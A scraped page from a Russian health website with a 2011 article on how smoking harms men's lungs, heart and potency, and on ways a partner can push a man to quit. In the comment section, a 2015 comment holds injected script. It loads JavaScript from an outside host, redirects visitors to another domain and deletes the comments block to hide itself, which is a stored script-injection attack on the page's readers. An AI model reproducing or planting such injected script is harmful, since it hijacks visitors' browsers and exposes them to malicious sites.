Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как отучить мужчину от ку...  >>  Как отучить мужчину от курения?
 
Обратная связь
 

Как отучить мужчину от курения?

Размер шрифта
25 мая 2011 00:00
  • google_analytics: false
  • Нравится

Главный атрибут «крутого парня» – тлеющая в руке сигарета. Удивительно, но помочь сильному полу отказаться от вредной привычки может пол слабый. И вот как.

Как отучить мужчину от курения

Егор Кошелев / «Здоровье-инфо»

Для мужчины, пристрастившегося к табакокурению, выкурить сигарету – еще раз подчеркнуть свой статус. Возьмем, например, кино. Сильные, смелые и красивые мужчины – настоящие герои – не брезгуют, как правило, алкоголем и табаком. К тому же получается у них это делать с таким шиком, что сразу возникает желание за ними повторить. Только вот актеры могут курить и пить спиртное на камеру, а в реальной жизни заниматься спортом и вести правильный образ жизни. Так что единственное, чего могут добиться их подражатели – многочисленных проблем со здоровьем. На фоне ослабленного курением иммунитета мужчины существует риск развития целого ряда заболеваний.

1. Органы дыхания

Легкие первыми принимают на себя удар табака. Проходя по дыхательным путям, табачный дым вызывает воспаления слизистых оболочек носоглотки, зева, трахеи, бронхов и легочных альвеол. Может развиться бронхиальная астма, так как в процессе курения постоянно раздражается слизистая бронхов. Хронический бронхит и курильщик всегда ходят рука об руку – регулярное вдыхание дыма приводит к накоплению табачных смол. Если астматик курит, то это может ухудшить кашель или и так затрудненное дыхание. Но самое опасное заболевание, с которым он может столкнуться – рак легких. Чем больше и чаще курит человек, тем ближе к нему подкрадывается смертельный недуг.

2. Сердечно-сосудистая система

Если у вас колет в боку, жжет за грудиной, если вы не можете вдохнуть от боли в сердце, это еще не значит, что всему виной возраст. Курение – вот враг вашей главной мышцы в организме. Всевозможные заболевания сердца и сосудов у мужчин, систематически курящих, как правило, является прямым следствием нарушений в работе сердечно-сосудистой системы. Курите? Вот вам букет в подарок: стенокардия, ишемическая болезнь сердца, атеросклероз, артериальная гипертония, аритмия, тахикардия, инфаркт миокарда. Задумайтесь только: сердце курильщика в течение суток сокращается на 12-15 тысяч раз больше сердечной мышцы некурящего человека. Любая ткань, в том числе и мышечная, не выдержит такой нагрузки и износится. Само собой, такая нагрузка ведет к преждевременному изнашиванию сердечной мышцы и нервной системы.

3. Репродуктивная функция

Подходим к главной проблеме «крутых парней», пристрастившихся к табаку – импотенции. Продукты горения смол вызывают в органах малого таза резкое сужение сосудов. Это затрудняет нормальную циркуляцию крови в предстательной железе, а половая функция угасает. Если ваш избранник курит много, то расскажите ему, что рано или поздно он будет лечить аденому, а впоследствии, если и это его не впечатлит, – рак.

Предложите молодому человеку сходить вместе в кино, театр или на выставку

Если же и это не испугает вашего спутника, то оставьте его в покое, вам просто не по пути. Но напоследок попробуйте несколько способов:

1. «Здесь не курят!»

Предложите молодому человеку сходить вместе в кино, театр или на выставку. Годится любое заведение, где администрацией запрещено курить. Вместе выберите кафе, возможно с благовониями, которые так портит сигаретный дым. Сейчас все большую популярность набирают рестораны и кафе, где курение под запретом. Ваш спутник будет вынужден на некоторое время ограничить себя в удовлетворении желания подымить.

2. Повод задуматься о близких

У вашего мужчины должен появиться стимул, ради чего ему следует отказаться от курения. Расскажите ему о вреде пассивного курения и влиянии табачного дыма на организм. Пусть клятвенно пообещает, что бросит, как только вы забеременеете. Даже если не выполнит обещание, то пусть хотя бы произнесет эту фразу. Ведь курение крайне опасно для здоровья беременной женщины, зародыша и плода. И вряд ли отец вашего ребенка хочет намеренно сделать его пассивным курильщиком.

3. Новое рабочее место

Неожиданный ход – подыщите вашему избраннику должность в престижной компании. Многие крупные фирмы отдают особое предпочтение сотрудникам без вредных привычек. А чтобы ему не было скучно оздоровляться в одиночку, устройте соревнование, кто быстрее бросит: вы – есть пирожные по вечерам, или он – курить в постели. Назначьте приз: первая зарплата либо на подарок ему, либо на подарок вам. Так что и за здоровье любимого тоже можно бороться с огоньком. Придется постараться, но результат того стоит! В случае с новым местом работы – если мужчина загорится желанием получить должность в «некурящей» компании, то ему, так или иначе, придется отказаться от пагубного пристрастия.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Топ-10 мифов о курении   Тяжелые последствия «легких» сигарет   Курение бьет по костям   В плену пассивного курения  
31 мая 2011Сегодня - Всемирный день отказа от курения 06 мая 2011Сигареты в Австралии станут «пугающими»
 
12 августа 2011Курящие женщины чаще умирают от инфарктов, чем мужчины 05 июля 2011Никотин только по рецепту
 

Слайдшоу

1
Какие привычки портят вам жизнь?
Как сохранить мозги в 30 лет
Что происходит в теле курящего

Тесты

1
Есть ли у вас остеопороз?
Как контролировать бронхиальную астму
Какая у вас стадия остеохондроза?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.